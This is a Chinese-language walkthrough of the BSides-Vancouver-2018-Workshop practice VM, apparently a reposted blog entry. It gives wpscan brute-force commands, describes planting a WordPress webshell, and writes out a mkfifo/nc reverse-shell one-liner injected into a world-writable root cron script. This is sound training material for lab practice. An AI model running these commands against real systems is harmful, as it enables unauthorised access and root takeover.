您的位置:首页 > 运维架构

靶机:BSides-Vancouver-2018-Workshop

2020-06-30 16:16 78 查看

靶机说明
靶机用ValualBox创建,目标是在其上获得root级访问。
目标
Boot to root:获得root权限和Flag。
运行环境
靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。
攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全面的渗透工具。
信息收集

查看靶机的ip发现是192.168.1.35 所以靶机的ip这是这个c段的,我们用nmap扫描下

nmap扫描出靶机地址

获取flag
详细扫描一下,发现开放了21 22 80

发现21端口开着 访问一下 格式是 ftp://192.618.1.32

发现一个文件 点开看一下发现很多账户名


开启了22端口 用超级弱口令检查工具暴破一下 发现密码

使用Xshell工具登录ssh

提权

拿到flag

获取root权限
通过dirb扫描网站目录发现 存在robots.txt 访问发现一隐藏了一个目录

发现是一个wp的博客,直接wpscan走一波
wpscan --url http://192.168.1.32/backup_wordpress/ --enumerate u 能爆出用户名

wpscan --url http://192.168.1.32/backup_wordpress -P/home/sun/文档/12.txt -U john

能爆出密码 需要指定用户名

至于使用的字典是darkweb2017-top10000.txt 大家可以百度找一下,本章的爆破都是基于darkweb2017-top10000.txt来的
在页面最下方有一个登录按钮

用刚才爆出密码账号登陆

我一般碰到wp建的站直接会在404报错界面写入shell,这次很幸运成功了

在kali本机监听端口 拿到shell

使用python获得一个新的shell python -c ‘import pty; pty.spawn("/bin/bash")’

查找每个用户文件,和浏览各目录文件,发现位于 /usr/local/bin/cleanup 文件,其权限是777,查看内容
为:
#!/bin/sh rm -rf /var/log/apache2/* # Clean those damn logs!!

这是一段清理Apache日志的脚本,需要root权限运行。
查看cleanup文件的权限为777,可以随意修改和执行,可以将文件内容改成一个反弹shell。
echo ‘#!/bin/bash’ > cleanup

echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.35 6666 > /tmp/f’ >> cleanup


再次查看 cleanup已经变成这样了

然后kali开启监听

再次查看一下cleanup文件就能反弹成功了

总结
以后见到了开放21端口的知道怎么登陆了,先登一下试试万一允许匿名访问呢
开放22端口的,先用搜集到的密码账户用爆破软件爆一下,可能会有收获,然后Xshell连接一下。
wpscan爆破wp搭建的网站真是神器。
编写反弹shell脚本至cleanup文件思路很特别。
**~~~~~~~~~~~~~~~~~~~~~~·**
至此,本靶机的练习到此结束,感谢各位大佬的倾力帮助,如有侵权,请联系我删除。

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: